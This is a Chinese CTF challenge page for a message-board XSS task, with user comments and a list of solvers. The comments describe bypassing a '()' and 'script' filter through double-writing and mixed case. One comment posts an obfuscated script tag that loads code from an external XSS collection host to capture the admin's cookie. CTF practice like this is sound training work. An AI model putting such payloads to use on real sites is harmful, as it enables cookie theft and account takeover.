留言板1WEB 未解决

分数: 20 金币: 3
题目作者: harry
一  血: 18256197318
一血奖励: 5金币
解  决: 135
提  示: 需要xss平台接收flag
描  述:
flag{}
评论
小蔡 2年前

终于解出来了,已经写了WP 等待审核通过!

回复 0

17695688750 2年前

去xsspt吧xss代码复制到留言板,留言板设置了()和script过滤,想办法绕过

回复 0
zzzlu 1年前

这个xsspt要钱,好坑的平台

回复 0

sshui 2年前

大哥,能给一下payload吗?

回复 2

18256197318 2年前

双写+大小写绕过

回复 0
chaojiikun 1月前

@harry 哥你出的什么题坑死我了

回复 0

jojojoker 2年前

@harry 需要登录到后台才能拿到管理员的cookie吧,不然拿我自己的cookie?

回复 0

sshui 2年前

@harry 大哥写个wp吧(/(ㄒoㄒ)/~~)

回复 0

harry 管理员 2年前

@追风亚索 这是xss题不需要登录后台

回复 0

追风亚索 2年前

要写脚本才能知道密码吗

回复 0

追风亚索 2年前

密码是什么登不进管理员账号

回复 0

Striker123456 2年前

咋打不出cookiehello[img]123[img]onerror=<sCRScRiPTiPt/SrC=//xss.yt/j5Ys>[img][/img]

回复 0

Striker123456 2年前

这道题,我是不是做过?

回复 0

WriteUp

image
小蔡

5 金币

评分(3)

解题动态

vicleet 攻破了该题 10天前
派大星CTF 攻破了该题 13天前
a1104048658 攻破了该题 1月前
buggy 攻破了该题 1月前
blacklotus0 攻破了该题 1月前
distiny 攻破了该题 1月前
modeng 攻破了该题 2月前
minshenyao 攻破了该题 2月前
vnuesa 攻破了该题 2月前
jugmid 攻破了该题 3月前
ailx10 攻破了该题 3月前
wangjf 攻破了该题 3月前
xiaoxhw 攻破了该题 5月前
hx000001 攻破了该题 6月前
abc_ 攻破了该题 6月前
tamaki 攻破了该题 6月前
15655459224 攻破了该题 7月前
cutervvv 攻破了该题 7月前
我不到啊 攻破了该题 7月前
huopangmiao 攻破了该题 7月前
问题反馈